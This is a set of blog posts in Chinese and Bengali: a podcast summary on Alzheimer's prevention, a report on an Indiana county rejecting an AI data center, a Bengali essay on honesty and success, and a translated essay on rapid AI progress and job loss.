Omega-3:購買後立即冷藏,避免氧化。選擇 NSF 認證品牌,優先考慮靠近自己居住地來源的魚油。

維生素 D:目標維持在約 60 ng/dL,缺乏者全因失智症風險上升 40%。

日常監測

每天早上量血壓。收縮壓超過 135 mmHg 就需要處理。可在 Amazon 購買約 25 美元的自動血壓計。高血壓會破壞大腦中僅一個細胞厚的微血管,是認知退化的重要風險因子。

考慮每三到四個月進行一次基本血液檢查,包含 Lipoprotein(a)、空腹血糖、血脂四項。

基因篩檢

可透過血液檢查確認自己的 APOE 基因型。攜帶一個 APOE4 拷貝的男性,風險提高 2 至 3 倍;攜帶兩個拷貝的男性,風險提高 10 倍。這不是宣判,而是讓你更有動力提早行動。

認知訓練

每天用手寫字、閱讀長篇內容。進行手眼協調訓練,例如單手拋接網球,可搭配眼罩(遮住一眼)和單腳站立增加難度,每次五分鐘即有效果。

做困難的事。讓自己定期處於要強迫自己才能完成某件事的狀態,這是訓練 AMCC 最直接的方式。

早期偵測

血液中的 P-tau 217 與 amyloid beta 指標,現在已可達到 PET 腦部掃描 90% 的診斷準確率。40 歲以後可以和醫師討論是否納入定期檢查項目。

回到目錄


女性專區:給所有女性的額外行動建議

女性面對阿茲海默症有額外的生理風險因子,以下建議是針對女性的補充行動項目,與前一章節的通用建議並列使用。

更年期的大腦能源危機

大腦葡萄糖代謝在更年期前後下降約 30%。這個窗口期是女性大腦最脆弱、也最需要主動干預的時期。

考慮採用生酮飲食或補充外源性酮體:大腦對酮體的利用效率實際上高於葡萄糖,在葡萄糖代謝受阻的情況下,酮體是更好的燃料來源。

確認正在接受充足的 Omega-3 補充,尤其是 DHA:大腦 60% 由脂肪構成,其中 70% 是 DHA。在更年期的代謝變化下,DHA 對細胞膜流動性的支撐更加重要。

荷爾蒙替代療法(HRT)

Louisa 對 HRT 的立場:目前沒有大規模隨機對照試驗直接證明 HRT 能預防失智症,但多項研究顯示 HRT 可降低阿茲海默症風險最多 30%,機制是間接的——它改善睡眠、減少熱潮紅造成的睡眠中斷、支撐肌肉與骨骼維持讓你有能力運動。

過去那份嚇走大多數女性的研究(Women's Health Initiative)的結論已被重新審視,我們現在有更多證據顯示 HRT 的利大於弊。但每個人的狀況不同,這是你需要和你的醫師討論的對話。

Louisa 個人計畫採用雌激素貼片。她的建議是從 40 歲起開始定期檢查荷爾蒙水平,不要等到症狀出現才行動。

APOE4 基因的女性特殊風險

APOE4 基因對女性的衝擊遠大於男性。攜帶一個 APOE4 拷貝的女性,阿茲海默症風險提高約 6 倍(男性同等情況為 2 到 3 倍)。攜帶兩個拷貝的女性,風險提高約 15 倍(男性為 10 倍)。

如果你的家族中有阿茲海默症病史,這個基因篩檢尤其值得認真考慮,不是為了恐懼,而是為了知道自己需要以多大的力度採取預防行動。

生育年齡與雌激素保護

雌激素在大腦中有多重保護功能,包括阻斷磷酸化濤蛋白的酶。睪固酮在男性體內能部分芳香化(aromatize)為雌激素,這是男性在同等年齡享有額外保護的原因之一。女性在更年期後失去這個保護,這個差異直接體現在發病率的性別懸殊上。

這不是命運,而是提醒你:從中年開始主動干預,對女性來說尤其緊迫。

對自己誠實,並勇於開口

Louisa 說,她最憤怒的事情之一,是看到女性長年低報症狀、太害怕麻煩醫師、或因為羞恥而隱藏自己的感受。她的外祖母就是這樣。

如果你感覺到記憶力變差、腦霧、睡眠品質退化、情緒波動,這些都值得被認真對待,不是因為你老了,而是因為這是你的大腦在發出訊號。

你值得被正確對待。你的大腦值得被保護。

回到目錄


本文整理自 Stephen Bartlett《The Diary of a CEO》Podcast 與神經科學家 Louisa Nicola 的深度訪談。Louisa Nicola 的研究與內容可在其個人平台 Neuroathletics 找到。


願偉大的女性朋友,都能健康。


 
Read more...

from Team Taiwan

image_indiana_ai_factory

2025 年 12 月 9 日,印第安納州聖約瑟夫縣的議事廳擠滿了人。

會議室裡沒有窗戶,座椅塞滿了,走廊還站著人,Zoom 連線人數多到系統直接當機。一個農業縣的尋常地方政府會議,一路開到凌晨四點。

這不是在討論農業補貼,也不是在吵學區劃分。

他們在決定的,是一個 130 億美元的 AI 資料中心,能不能在他們的土地上長出來。

最後,7 比 2,拒絕。

這個結果讓矽谷震動了一下。但沒有人真的以為這場仗就此結束。


目錄

先說一個讓人頭皮發麻的數字。

2024 年,光是 Amazon、Google、Meta、Microsoft 這四家公司,在資本支出上就花了 4,000 億美元。

GDP 等級的錢。

這些錢大部分流向同一個地方:資料中心。

而這波浪潮的觸發點,不難猜。ChatGPT 在 2022 年底出現之後,每一季的財報電話會議裡,你都能聽到同一個主題:我們要蓋更多資料中心,蓋更大的,蓋得更快。

在資料中心產業,衡量規模的單位不是建坪,是電力需求。一座大型 AI 資料中心的耗電量,可以等於一百萬個美國家庭。

冷卻晶片要用水,訓練模型要用電,而電要來自電網,電網要來自發電廠,發電廠要來自土地。

一條供應鏈,最終的起點,是某個農業縣邊上的一塊空地。

回到目錄


一個什麼都沒有的縣,突然來了 Amazon

聖約瑟夫縣在印第安納州北部。大城市是南灣(South Bend),但縣裡大部分地區是農田。

這裡曾經有 Studebaker 汽車廠,後來倒了,留下一片需要再工業化的中西部鄉鎮。像很多上中西部的城鎮一樣,他們一直在等待下一個能撐起地方經濟的大計劃。

2023 年 5 月,機會來了,以一種讓人有點措手不及的方式。

地方電力公司帶著 Amazon 走進了縣經濟發展辦公室。這已經是全美各地反覆上演的劇本:電力公司熟悉自己轄區的土地,他們成了媒合者,把科技巨頭和有地有電的農業縣牽在一起。

這個案子不是普通的資料中心。Amazon 要蓋的,是專門供 Anthropic 使用的運算基礎設施,一個用來訓練下一代 AI 模型、並且部署 Claude 服務的巨型機器。

規模是多少?110 億美元起跳。

縣議會投票。反對的只有兩票。「沒什麼大事,大家也不太了解它,」紐約時報記者 Karen Wise 說,「就通過了。」

然後,一切開始快速改變。

一年之內,工地上起了十幾棟建築物,每天有數千名工人在裡面。旅館住滿了,RV 露營車停滿了,縣裡的房屋稅收開始有感成長。後來,Microsoft 也在縣裡另一個地方簽下土地合約。謠言說 Meta 也在附近打量,Google 也有動作。

一個本來沒有半個資料中心的縣,在兩年內,突然成了全球 AI 基礎建設的主要節點之一。

回到目錄


你說的好處,真的是好處嗎

科技公司的說法很清楚:這是 win-win。

稅收進來了,工作機會進來了,你們縣可以成為未來經濟的一部分。

而且不是空話。

工地上的電氣技師,年薪可以到 20 萬美元。學徒制的名額兩年內翻了一倍。工會代表在縣議會上一個接一個站起來發言,他們說的都是自己的真實故事:我 19 歲沒有學貸,靠這個工地進入了 Operating Engineers Local 150,有了穩定工作,能養家了。

這些不是說客說的漂亮話。這是真實發生在真實人身上的事。

但問題是,好處集中在某一群人身上,成本卻分散給了所有人。

住在工地旁的居民,開始遇到前所未有的塞車和超速。農民在路邊割草,工程車從旁呼嘯而過,碎石飛濺。水資源的問題開始浮出水面,有人擔心自家的井會乾。夜間的光污染讓一片農村失去了星空。

「我們 68 年前搬來這裡,為的是寧靜、安靜、小鎮的生活品質,」一位居民在聽證會上說。

還有更大的恐懼,難以被任何稅收數字所化解:

AI 會不會搶走接下來的工作?這些資料中心蓋好之後,如果技術繼續進步,它們 10 年後還需要這麼多電力和空間嗎?如果這些建築物有一天變成空殼,要怎麼辦?

「我不覺得人類滅絕快要發生,」一位居民說,「但是,那些比我們懂這件事多得多的人,都說他們很恐慌。這讓我覺得,我們至少應該停下來想一想。」

回到目錄


凌晨四點的投票

然後,更大的案子來了。

一個 130 億美元、需要超過 400 公頃土地的新資料中心,要申請土地重分區。幕後的開發商是一個匿名的 LLC,外界只知道全球只有少數幾家公司能用到這麼大的運算量,但沒有人知道業主是誰。

這種匿名性,讓原本就存在的不安加倍放大。

因為需要重分區,這個案子必須回到縣議會,公開辯論,讓社區有機會說話。

這一次,聖約瑟夫縣的反應不再是冷漠。

2025 年 12 月 9 日的聽證會,主會場坐滿,側廳站滿,大廳還站著人。Zoom 連線達到系統上限。

支持方先上場:工會代表、地方商界人士,說的是就業、稅收、經濟轉型。反對方輪到發言,說的是土地、水、空氣、生活品質、以及那些更難被量化的東西。

「他們會來這裡蓋,是因為他們覺得我們沒有人管,」一位居民說,「他們以為我們不在乎,他們以為他們能得逞。」

聽證會一直開到凌晨四點。

然後投票:7 比 2,拒絕重分區。

Amazon 的那個案子,蓋都蓋了,也在繼續。但這個新的 130 億美元計劃,縣議會說:夠了。

回到目錄


矽谷的下一步棋

一個縣的否決,能改變什麼?

科技公司的回答是:不多。

他們的策略是大量分散。因為需求如此龐大,他們不依賴任何一個地點,而是同時在幾十個地方推進。你擋下了這個,他們去找下一個。

今年全球在資料中心上的投入,預計超過 5,000 億美元。這比去年多,明年比今年更多。

科技公司也在調整話術。「資料中心」這個詞不夠性感,現在他們更常說「AI 工廠」——factory,一個讓人聯想到生產、就業、工業繁榮的字眼。

他們也開始做更多讓步。Microsoft 宣布不會要求房地產稅減免,並承諾公開各地的用水量數據。Amazon 在印第安納另一個案子裡,直接砸了約 1 億美元的前期財務承諾給地方政府。

他們還在政治上動起來。有居民說,聽證會前幾週,他們收到了支持資料中心的文字簡訊,有人上門敲門拉票,電視廣告也出現了。

訊息很清楚:這是未來。搭上這班車,就能分享未來的果實。不搭,你就會被留在原地。

回到目錄


誰擁有土地,誰就擁有籌碼

但聖約瑟夫縣的例子,揭示了一件科技公司可能低估的事:

擁有好地和好電的地方,現在手上有貨。

「如果你有好的土地,有可用的電力,你現在手上握著極度珍貴的東西,」Karen Wise 說,「這個認知,讓地方社區意識到他們其實有籌碼。」

科技公司需要的地,不是無限供應的。他們需要大面積的空地、已有的電力基礎設施、良好的輸電線路和網路連結,以及——理想上——一個歡迎他們的社區。

每一個符合條件的地點,都是稀缺資源。而每一個符合條件的地方政府,都掌握著這個稀缺資源的許可權。

「這不是透過聯邦政策發生的,」Wise 說,「這是在那種小小的、沒有窗戶的房間裡發生的,是在一個個縣議員的辦公室裡發生的,是在那些一坐好幾個小時的社區聽證會裡發生的。」

民主,在最基層的層面上,有時候仍然有效。

回到目錄


這不是科技新聞,這是地方民主

最後,我想說一件可能讓人覺得奇怪的事。

這則故事的核心,其實不是 AI,不是資料中心,不是科技公司。

它的核心,是一個更古老的問題:當外來的巨大力量碾過來,一個社區如何決定自己要什麼。

Studebaker 當年來,聖約瑟夫縣說好。 Studebaker 走了,留下了空缺。 Amazon 來了,縣說好。 下一個 130 億美元的計劃來,縣說不。

這中間發生的,是一個社區試著從過去的經驗學習,試著在某件事從天上落下來之前,先想清楚自己要什麼。

它不完美。它漫長、吵雜、充滿矛盾,有時候在凌晨四點才有答案。

但這就是它應該有的樣子。

那個 130 億美元的資料中心最後會蓋在哪裡?大概會找到一個願意讓它落地的地方。但那個地方,至少,知道自己在答應什麼。


本文整理自《紐約時報》Podcast《The Daily》2026 年 2 月 16 日播出之〈When A.I. Comes to Town〉,記者 Karen Wise 採訪報導。


回到頁首

 
Read more...

from লোকমানুষ এর ব্লগ

⠀⠀ আমরা সাধারণত চোখের সামনে যা দেখি, তাকেই সত্য ধরে নিই। আজ কার লাভ হলো, কে উন্নতি করল, কে ক্ষমতার চেয়ারে বসল -এসব দিয়েই আমরা সফলতা আর ব্যর্থতার বিচার করি। অথচ জীবন এত সরল নয়। জীবনের হিসাব অনেক গভীর, অনেক বিস্তৃত। এখানে সময়ের সাথে সাথে জীবনের সমীকরণ বদলায়, আরও বদলে যায় সফলতার সংজ্ঞা।

একদিন তাড়াহুড়ো করে বাসে উঠতে গিয়ে বাদামের ঝুড়ি হাতে রফিক মিয়া হোঁচট খেয়ে পড়ে গেল। ঠিক সেই মুহূর্তে ট্র্যাফিক ছেড়ে দেওয়ায় কয়েকটি গাড়ির চাকার নিচে পিষ্ট হলো তার সারা দিনের পুঁজি -বাদামের ঝুড়ি। মুহূর্তেই শেষ হয়ে গেল তার রুজি-রুটি। অসহায় মুখ নিয়ে দাঁড়িয়ে রইল সে।

অন্যদিকে একই রুটে বাদাম বিক্রি করা শফিক মিয়ার সেদিন দারুণ লাভ হলো। রফিক না থাকায় দ্বিগুণ বিক্রি করল সে। হাতে এলো ভালো অঙ্কের টাকা। আপাতদৃষ্টিতে ঐদিনের জন্য শফিক হলো সফল, আর রফিক হলো ব্যর্থ, নিঃস্ব একজন। কিন্তু সন্ধ্যায় সারা দিনের আয় নিয়ে শফিক বসে গেল জুয়ার আসরে। রাত শেষ হতেই উপার্জিত সব টাকা হারিয়ে সেও শূন্যে নেমে এলো। সকালে দেখা গেল- রফিক আর শফিক দুজনকেই আবার শূন্য শুরু করতে হবে। তবে পার্থক্য এক জায়গায়।

রফিক মিয়া ছিল সৎ, ভদ্র ও পরিশ্রমী মানুষ। সবাই তাকে বিশ্বাস করত। তাই সে যখন নতুন করে ব্যাবসা শুরু করতে চাইল, তখন মানুষ বিনা দ্বিধায় তাকে বাকীতে মাল দিল। মানুষের বিশ্বাসই হয়ে উঠল তার নতুন মূলধন। অন্যদিকে শফিকের জুয়ার নেশা আর অবিশ্বস্ততা কথা সবাই জানত। তাই কেউ তাকে বাকীতে মাল দিতে চাইল না। বিশ্বাসহীন মানুষের জন্য পৃথিবীর কোনো দরজাই কখনো খোলা থাকে না।

⠀⠀ এবার চলুন আরেকটি গল্প শুনি। গল্পটা সুমন নামের এক অফিসের সহকারী ম্যানেজারের। সারাদিন বসকে তোষামোদ করে সময় কাটাত, আবার আড়ালে তারই বদনাম করে বেড়াত। তবে তার একটা সুপ্ত ও গোপন ইচ্ছা ছিল। ইচ্ছেটি ছিল- কবে বসের চাকরি যাবে আর সে সেই চেয়ারে বসবে। অনেক দিন পর তার সেই চাওয়া পূরণ হলো। তার বস চাকরি ছেড়ে চলে গেল, আর সুমন পদোন্নতি পেয়ে হলো ম্যানেজার।

মানুষের চোখে সে সফল। কিন্তু সফলতা আর ইচ্ছে পূরণ তো আর তার চরিত্র বদলাতে পারে না। আগের মতোই চললল তার অফিস পলিটিক্স, ষড়যন্ত্র, স্বজনপ্রীতি আর তোষামোদের রাজনীতি। ফলে বিশ্বস্ত, কর্মঠ ও যোগ্য কর্মচারীরা একে একে চাকরি ছাড়তে লাগল। শূন্য পদে নিয়োগ পেল অদক্ষ, তেলবাজ ও অনভিজ্ঞ লোকজন। আর এসব কারণে কোম্পানির ক্ষতি বাড়তে থাকল। শেষ পর্যন্ত কর্তৃপক্ষ বাধ্য হয়ে সুমন ও তার গড়া পুরো দলকেই ছাঁটাই করলো।

⠀⠀ আরও একটি গল্প শোনা যাক। পরীক্ষায় একজন নকল করে ভালো রেজাল্ট করল, আর অন্যজন সততার সাথে পরিশ্রম করে মাঝারি ফল পেল। সবাই প্রথমজনকে মেধাবী বলল। কিন্তু সময়ের সাথে দেখা গেল- নকলের সাফল্য টেকেনি, আর পরিশ্রমী মানুষটি ধীরে ধীরে জীবনে অনেক দূর এগিয়ে গেছে।

এই গল্পগুলো আমাদের চারপাশে ঘটে চলেছে। গল্প গুলো আমাদের শেখায়- সফলতা একদিনের অর্জন নয়, এটি একটি দীর্ঘ প্রক্রিয়ার ফসল। সাময়িক লাভ, ক্ষমতা কিংবা বাহবা প্রকৃত সাফল্যের পরিচয় নয়। প্রকৃত সাফল্য গড়ে ওঠে সততা, পরিশ্রম, নৈতিকতা, ধৈর্য ও মানবিকতার ওপর ভর করে।

⠀⠀

⠀⠀

জীবনে দ্রুত সফল হওয়ার চেয়ে সঠিক পথে এগোনো বেশি গুরুত্বপূর্ণ।

জীবন এক নিরন্তর প্রবহমান ধারা। এই ধারার সামনে টিকে থাকার জন্যে সততা, পরিশ্রম, ধৈর্য ও নৈতিকতা -এই চারটি স্তম্ভ শক্ত করে গড়তে হবে। আর এই স্তম্ভের ওপর দাঁড়ানো সাফল্যই প্রকৃত সাফল্য। তাই কাউকে সফল বা ব্যর্থ বলার আগে একটু থামা উচিত। কারণ আমরা দেখি ঢেউয়ের তোড়, কিন্তু জানি না স্রোতের গতি। আর এই অদেখা স্রোতের কাছেই তো শেষ কথা বলার অধিকার থাকে।

⠀⠀

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from Team Taiwan

很多人從「某些事情是安全的」這個概念中尋找安慰——AI 可以處理日常工作,但無法取代人類的判斷力、創造力、戰略思維、同理心。

我以前也這麼說。

我不確定我現在還相信這一點。


作者:Matt Shumer,2026 年 2 月 9 日

回想一下 2020 年 2 月。

如果你當時特別留意,也許你注意到有幾個人在談論一種在海外蔓延的病毒。但大多數人並沒有特別留意。股市表現很好,你的孩子在上學,你照常去餐廳、握手、規劃旅行。如果有人告訴你他在囤積衛生紙,你大概會覺得他在網路的奇怪角落待太久了。然後,在大約三週內,整個世界翻天覆地。你的辦公室關閉了,孩子回到家,生活變成了一個月前的你絕對不會相信的模樣。 我認為,我們現在正處在一件遠比新冠肺炎大得多的事情的「感覺小題大作」階段。

我在 AI 新創公司工作了六年,也在這個領域進行投資。我活在這個世界裡。而我寫這篇文章,是為了我生命中那些不活在這個世界裡的人——我的家人、朋友,以及那些一直問我「AI 到底是怎麼回事?」卻得不到足以反映真實情況的答案的人。我一直給他們的是那個客套版本,那個雞尾酒派對版本。因為誠實的版本聽起來像我瘋了。有一段時間,我告訴自己這是一個足夠好的理由,讓我把真正發生的事藏在心底。但我說的話與真實發生的事之間的落差,已經大到無法忽視了。我在乎的人值得聽到即將到來的事,即使它聽起來很瘋狂。

我要先說清楚一件事:儘管我在 AI 領域工作,我對即將發生的事幾乎沒有任何影響力,業界絕大多數人也一樣。未來正在被少數人塑造:幾間公司裡幾百名研究人員——OpenAI、Anthropic、Google DeepMind,以及少數幾家。一個由小團隊在幾個月內管理的訓練過程,就可以產出一個改變整個技術走向的 AI 系統。我們這些在 AI 領域工作的人,大多數都是在我們沒有奠定的基礎上進行建設。我們和你一樣在旁觀這一切——只是我們碰巧離得夠近,能先感受到地面的震動。

但現在是時候了。不是那種「最終我們應該談談這件事」的方式,而是「這正在發生,我需要你理解它」的方式。


我知道這是真的,因為它先發生在我身上

科技圈以外的人尚未完全理解的事情是:為什麼業界這麼多人現在都在發出警報——因為這已經發生在我們自己身上了。我們不是在預測。我們在告訴你,這在我們自己的工作中已經發生,並警告你:你是下一個。

多年來,AI 一直在穩定進步,偶爾有大躍進,但每次躍進之間的間隔都足夠長,讓你能夠消化。然後在 2025 年,新的模型訓練技術解鎖了更快的進步速度。然後更快。再更快。每一個新模型不只是比上一個更好——進步的幅度更大,新模型的發布間隔也更短。我越來越多地使用 AI,與它來回的次數越來越少,看著它處理我曾經認為需要我專業知識的事情。

然後,在 2 月 5 日,兩個主要的 AI 實驗室在同一天發布了新模型:OpenAI 的 GPT-5.3 Codex,以及 Anthropic 的 Opus 4.6(Claude 的製造商,ChatGPT 的主要競爭者之一)。有什麼東西「喀嚓」了一聲。不像一個開關被打開——更像是當你意識到水一直在你周圍上漲,現在已經到了你胸口的那一刻。

我在工作中實際的技術工作上已不再被需要了。 我用普通英文描述我想要建構的東西,它就……出現了。不是我需要修改的草稿,而是完成品。我告訴 AI 我想要什麼,離開電腦四個小時,回來發現工作已完成。完成得很好,比我自己做的還好,無需修改。幾個月前,我還在與 AI 來回溝通、引導它、做修改。現在我只需要描述結果然後離開。

讓我舉個例子,讓你了解這在實踐中的樣子。我會告訴 AI:「我想建立這個應用程式,以下是它應該做的事,大致上應該長這樣,把使用者流程、設計都搞定。」然後它就會去做。它寫了數萬行程式碼。然後,這是一年前無法想像的部分——它自己打開這個應用程式,點擊按鈕,測試功能,像人一樣使用這個應用程式。如果它不滿意某個地方的外觀或感覺,它自己回去修改,獨立迭代、修復和完善,直到滿意為止。只有當它決定這個應用程式達到它自己的標準後,才回來對我說:「可以讓你測試了。」而當我測試它時,通常是完美的。

我沒有誇大。這就是我本週一的工作樣貌。

但最讓我震撼的是上週發布的模型(GPT-5.3 Codex)。它不只是在執行我的指令,它在做出有智慧的決策。它第一次有了感覺像是判斷力的東西,有了品味——那種無法言說的、知道什麼是正確決定的感覺,是人們一直說 AI 永遠不會擁有的東西。這個模型擁有它,或者說足夠接近,以至於這個區別開始變得不那麼重要了。

我一直是 AI 工具的早期採用者,但過去幾個月震驚了我。這些新的 AI 模型不是漸進式的改進,這是完全不同的事物。

這就是為什麼這件事對你也很重要,即使你不在科技業。

AI 實驗室做了一個刻意的選擇:他們首先專注於讓 AI 擅長寫程式碼——因為建構 AI 本身需要大量程式碼。如果 AI 能寫那些程式碼,它就能幫助建構下一個版本的自己,而那個更聰明的版本可以寫出更好的程式碼,進而建構出更聰明的版本。讓 AI 擅長寫程式,是解鎖一切的策略。這就是為什麼他們先做這件事。我的工作比你的工作更早開始改變,不是因為他們針對軟體工程師——這只是他們選擇先瞄準的方向的副作用。

他們現在已經完成了。他們正在轉向其他一切。

科技工作者在過去一年所經歷的,看著 AI 從「有用的工具」變成「比我更擅長做我的工作」,就是其他每個人即將要經歷的。法律、金融、醫學、會計、顧問、寫作、設計、分析、客戶服務。不是十年後。建構這些系統的人說是一到五年。有些人說更短。而以我在過去幾個月看到的情況,我認為「更短」更有可能。


「但我試過 AI,它沒那麼好用」

我常聽到這句話,我理解,因為這曾經是真的。

如果你在 2023 年或 2024 年初試過 ChatGPT,覺得「它會捏造資訊」或「沒什麼印象深刻」,你是對的。那些早期版本確實有侷限,它們會自信地說出一些胡說八道的話。

那是兩年前的事了。以 AI 的時間尺度來說,那是遠古時代。

今天可用的模型,與六個月前的相比已是面目全非。關於 AI 是否「真的在進步」或「撞牆了」的爭論,那個持續超過一年的爭論,結束了。誰還在做那種論斷,要麼是沒有使用過當前的模型,要麼是有動機去淡化正在發生的事,要麼是基於 2024 年的體驗來評估,而那已不再相關。公眾認知與當前現實之間的鴻溝是巨大的,而這個鴻溝是危險的——因為它阻止人們做好準備。

問題的一部分是大多數人在使用免費版本的 AI 工具。免費版本比付費用戶能使用的東西落後超過一年。以免費版 ChatGPT 來評判 AI,就像用折疊式手機來評估智慧型手機的現狀。每天真正把頂尖工具用於實際工作的付費用戶,知道接下來會發生什麼。

我想到我的一位律師朋友,我一直告訴他在事務所嘗試使用 AI,他一直找理由說行不通——它不是為他的專業領域建構的、測試時出了錯、它不理解他工作的細微之處。我理解。但我已經有大型律師事務所的合夥人聯繫我尋求建議,因為他們試過了當前版本,看到了這將走向何方。其中一位大型事務所的管理合夥人,每天花幾個小時使用 AI。他告訴我,這就像有一個隨時可以立即調度的助理團隊。他不是因為它是玩具才用它,他用它是因為它有用。他告訴我一句讓我念念不忘的話:每隔幾個月,它在他工作上的能力就會顯著提升。他說如果它保持這個軌跡,他預計在不久後它就能完成他所做的大部分事情——而他是一位有幾十年經驗的管理合夥人。他沒有恐慌,但他非常密切地關注著。

那些在業界領先的人(那些真正認真嘗試的人),並沒有輕視這件事,他們被它已經能做到的事情震驚,並據此調整好自己的位置。


這一切進展有多快

讓我把進步的速度說得具體一點,因為如果你沒有密切追蹤,這是最難相信的部分。 2022 年,AI 連基本的算術都無法可靠地完成,它會自信地告訴你 7 × 8 = 54。 到了 2023 年,它可以通過律師考試。 到了 2024 年,它可以寫出可運行的軟體,並解釋研究所等級的科學知識。 到了 2025 年底,世界上一些最優秀的工程師表示,他們已將大部分程式碼編寫工作交給了 AI。

2026 年 2 月 5 日,新的模型出現了,讓之前的一切感覺像是另一個時代。

如果你已有幾個月沒有嘗試 AI,今天存在的東西對你來說將會難以辨認。

有一個叫做 METR 的組織實際上用數據衡量這一點。他們追蹤一個模型在沒有人類幫助的情況下,能夠端到端成功完成的真實世界任務的時長(以人類專家完成該任務所需的時間來衡量)。大約一年前,答案大概是十分鐘,然後是一個小時,然後是幾個小時。最近的測量(2025 年 11 月的 Claude Opus 4.5)顯示,AI 能夠完成需要人類專家將近五個小時才能完成的任務。而這個數字大約每七個月翻一番,最新數據表明它可能正在加速到每四個月翻一番。

即使是這個測量,也尚未更新納入本週才剛出現的模型。根據我的使用體驗,這次躍進是極其顯著的。我預計 METR 圖表的下一次更新將顯示另一個重大飛躍。

如果你延伸這個趨勢(它已持續多年,沒有趨緩的跡象),我們看到的是:在不到一年內,AI 將能夠獨立工作數天;兩年內,數週;三年內,可以處理長達一個月的專案。

Amodei 說,「在幾乎所有任務上都大幅優於幾乎所有人類的 AI 模型」,有望在 2026 或 2027 年實現。

讓這件事沉澱一下。如果 AI 比大多數博士更聰明,你真的認為它做不到大多數辦公室工作嗎? 想想這對你的工作意味著什麼。


AI 正在建構下一個 AI

還有一件事正在發生,我認為這是最重要的發展,也是最不被理解的。

2 月 5 日,OpenAI 發布了 GPT-5.3 Codex。在技術文件中,他們寫道:

「GPT-5.3-Codex 是我們第一個在創建自身方面發揮了重要作用的模型。Codex 團隊使用早期版本來調試自身的訓練、管理自身的部署,並診斷測試結果和評估。」

再讀一遍。這個 AI 幫助建構了自己。

這不是對某天可能發生的事情的預測。這是 OpenAI 現在告訴你,他們剛剛發布的 AI 被用來創建自身。讓 AI 變得更好的主要因素之一,是應用於 AI 開發的智慧。而 AI 現在已足夠聰明,可以有意義地貢獻於自身的改進。

Anthropic 的 CEO Dario Amodei 說,AI 現在正在為他的公司編寫「大量程式碼」,當前 AI 與下一代 AI 之間的回饋循環正在「逐月加速」。他說我們可能「距離當前這代 AI 自主建構下一代的時間點只有一到兩年」。

每一代都幫助建構下一代,下一代更聰明,更快地建構下一代,而那個更聰明的版本繼續這個循環。研究人員稱之為「智慧爆炸」。而那些最清楚的人——正在建構它的人——相信這個過程已經開始了。


這對你的工作意味著什麼

我要直接告訴你,因為我認為你值得獲得誠實,而不是安慰。

Dario Amodei,可能是 AI 業界最注重安全的 CEO,公開預測 AI 將在一到五年內消滅 50% 的入門級白領工作。業界許多人認為他還保守了。根據最新模型的能力,大規模顛覆的條件可能在今年年底之前就到來了,它要滲透整個經濟還需要一些時間,但基礎能力現在就已到來。

這與以前每一波自動化都不同,我需要你理解為什麼。AI 不是在取代某一個特定的技能。它是認知工作的通用替代品,同時在所有事情上都變得更好。當工廠自動化時,被取代的工人可以重新培訓成辦公室工作者。當網路顛覆零售業時,工人轉向物流或服務業。但 AI 不會留下一個方便轉移的空缺。無論你重新培訓什麼,它也在那方面進步。

讓我舉幾個具體的例子讓這件事有感——但我要說清楚,這些只是例子,這個清單遠不完整。如果你的工作沒有被提到,這並不意味著它是安全的。幾乎所有的知識工作都受到影響。

法律工作:AI 已經能夠閱讀合約、總結判例法、起草訴狀、進行法律研究,達到堪比初級合夥人的水準。

財務分析:建立財務模型、分析數據、撰寫投資備忘錄、生成報告。AI 勝任這些工作,並且正在快速進步。

寫作與內容:行銷文案、報告、新聞報導、技術寫作。品質已達到許多專業人士無法區分 AI 輸出與人類作品的程度。

軟體工程:這是我最熟悉的領域。一年前,AI 連幾行程式碼都很難寫正確。現在它寫出數十萬行可以正確運行的程式碼。工作的大部分已經自動化——不只是簡單的任務,而是複雜的、多天的專案。幾年內,程式設計職位將大幅減少。

醫學分析:閱讀掃描影像、分析化驗結果、提出診斷建議、審查文獻。AI 在多個領域已接近或超過人類的表現。

客戶服務:真正有能力的 AI 代理——不是五年前令人沮喪的聊天機器人——正在被部署,處理複雜的多步驟問題。

很多人從「某些事情是安全的」這個概念中尋找安慰——AI 可以處理日常工作,但無法取代人類的判斷力、創造力、戰略思維、同理心。我以前也這麼說。我不確定我現在還相信這一點。

最近的 AI 模型所做的決定,感覺像是判斷力。它們展示出一種感覺像品味的東西——一種直覺式的感知,知道什麼是正確的選擇,而不只是技術上正確的選擇。一年前,這是無法想像的。我現在的經驗法則是:如果一個模型今天顯示出某種能力的哪怕是一絲跡象,下一代將真正擅長它。這些東西是指數式增長的,不是線性的。

AI 會複製人類深刻的同理心嗎?取代多年建立的關係中的信任?我不知道。也許不會。但我已經看到人們開始依賴 AI 尋求情感支持、建議和陪伴,這個趨勢只會增長。

我認為誠實的答案是:在中期內,任何可以在電腦上完成的事情都不是安全的。如果你的工作發生在螢幕上(如果你核心工作是通過鍵盤閱讀、寫作、分析、決策、溝通),那麼 AI 正在覬覦其中的重要部分。時間表不是「某天」,它已經開始了。

最終,機器人也將處理體力工作,只是現在還沒完全到位。但以 AI 的標準來說,「還沒完全到位」有一種令人意外地快速變成「已到位」的方式。


你實際上應該做什麼

我寫這篇文章不是為了讓你感到無助,而是因為我認為你現在能擁有的最大優勢,就只是早一步。早一步理解,早一步使用,早一步適應。

認真使用 AI,而不只是把它當搜尋引擎。 訂閱 Claude 或 ChatGPT 的付費版本,一個月 20 美元。但兩件事很重要。第一:確保你使用的是最佳可用模型,而不只是預設的。這些應用程式通常預設使用更快但更笨的模型,深入設定或模型選擇器,選擇最強大的選項。現在 ChatGPT 上是 GPT-5.2,Claude 上是 Opus 4.6,但這每隔幾個月就會改變。

第二,更重要的是:不要只用它來問簡短的問題,這是大多數人犯的錯誤,他們把它當 Google 用,然後困惑地問有什麼了不起。應該把它真正帶進你的工作。如果你是律師,就把合約餵給它,請它找出每一個可能傷害你客戶的條款。如果你在金融業,給它一份雜亂的試算表,請它建立模型。如果你是主管,把你團隊的季度數據貼上去,請它找出背後的故事。走在前面的人不是隨意地使用 AI,他們在積極尋找方法自動化那些以往要花幾個小時的工作。從你花最多時間的事情開始,看看會發生什麼。

不要因為某件事看起來太難就假設它辦不到,先試試。如果你是律師,不要只用它來做快速的研究問題,給它一整份合約,請它起草一份回應。如果你是會計師,不要只問它稅法,給它客戶的完整申報表,看看它找到什麼。第一次嘗試可能不完美,沒關係,反覆試驗、重新措辭、給更多背景、再試一次。你可能會對什麼奏效感到震驚。記住:如果它今天勉強有效,你幾乎可以確定六個月後它將近乎完美地完成它。這個軌跡只往一個方向走。

